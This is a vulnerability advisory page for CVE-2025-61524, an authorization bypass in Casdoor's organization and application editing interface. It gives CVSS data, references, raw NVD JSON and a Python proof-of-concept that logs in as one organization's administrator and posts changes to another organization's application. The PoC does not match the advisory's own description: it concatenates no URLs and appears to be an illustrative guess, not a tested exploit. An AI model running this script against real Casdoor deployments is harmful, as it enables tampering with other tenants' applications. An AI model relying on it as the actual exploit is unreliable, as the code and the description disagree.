Security Vulnerability Report
CVE-2025-61524 CVSS 7.2 HIGH

Published: 2025-10-08 19:15:45
Last Modified: 2026-04-15 00:35:42

Description

An issue in the permission verification module and the organization/application editing interface of Casdoor v2.26.0 and earlier, fixed in v2.63.0, allows a remote authenticated administrator of any organization in the system to bypass the permission verification mechanism by directly concatenating URLs after login.

CVSS Details

CVSS Score
7.2
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Casdoor <= v2.26.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-61524 PoC - Casdoor Permission Verification Bypass
# This PoC demonstrates the URL concatenation attack to bypass permission verification
import requests

# Target Casdoor server
TARGET_URL = "http://target-casdoor-server:8000"


# Step 1: Login as an authenticated administrator of any organization
def login(username, password, org_name):
    session = requests.Session()
    login_url = f"{TARGET_URL}/api/login"
    login_data = {
        "username": username,
        "password": password,
        "organization": org_name,
    }
    response = session.post(login_url, json=login_data)
    if response.status_code == 200:
        # Extract authentication token from response
        token = response.json().get("data", {}).get("token")
        if token:
            session.headers.update({"Authorization": f"Bearer {token}"})
    return session


# Step 2: Bypass permission verification by URL concatenation
def exploit_permission_bypass(session, target_org, target_app):
    # The vulnerability allows accessing other organizations' resources
    # by concatenating the target organization/application in the URL
    bypass_url = f"{TARGET_URL}/api/edit-application"
    # Directly access another organization's application edit interface
    payload = {
        "owner": target_org,  # Target organization (not the attacker's org)
        "name": target_app,   # Target application name
        "displayName": "Modified by Attacker",
        # ... other malicious modifications
    }
    response = session.post(bypass_url, json=payload)
    return response


# Step 3: Execute the attack
if __name__ == "__main__":
    # Login as admin of organization A
    session = login("attacker_admin", "password123", "organization-a")
    # Bypass permission check to modify organization B's application
    result = exploit_permission_bypass(session, "organization-b", "target-app")
    if result.status_code == 200:
        print("[+] Permission bypass successful!")
        print("[+] Successfully modified target organization's application")
    else:
        print("[-] Exploit failed")

# Note: This PoC is for educational and authorized testing purposes only.
# The vulnerability is fixed in Casdoor v2.63.0.
```

References

http://casdoor.com
https://gist.github.com/DevHjz/e75cea851d48e5f5478ac2a90757851a
https://github.com/casdoor/casdoor/commit/d883db907bb6e0b95737ef8e8b57b7da9078cbdd
https://github.com/casdoor/casdoor/releases/tag/v2.63.0

Raw JSON Data

```json
{"cve": {"id": "CVE-2025-61524", "sourceIdentifier": "[email protected]", "published": "2025-10-08T19:15:44.720", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "An issue in the permission verification module and organization/application editing interface in Casdoor v2.26.0 and before, and fixed in v.2.63.0, allows remote authenticated administrators of any organization within the system to bypass the system's permission verification mechanism by directly concatenating URLs after login"}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-285"}]}], "references": [{"url": "http://casdoor.com", "source": "[email protected]"}, {"url": "https://gist.github.com/DevHjz/e75cea851d48e5f5478ac2a90757851a", "source": "[email protected]"}, {"url": "https://github.com/casdoor/casdoor/commit/d883db907bb6e0b95737ef8e8b57b7da9078cbdd", "source": "[email protected]"}, {"url": "https://github.com/casdoor/casdoor/releases/tag/v2.63.0", "source": "[email protected]"}, {"url": "https://gist.github.com/DevHjz/e75cea851d48e5f5478ac2a90757851a", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}
```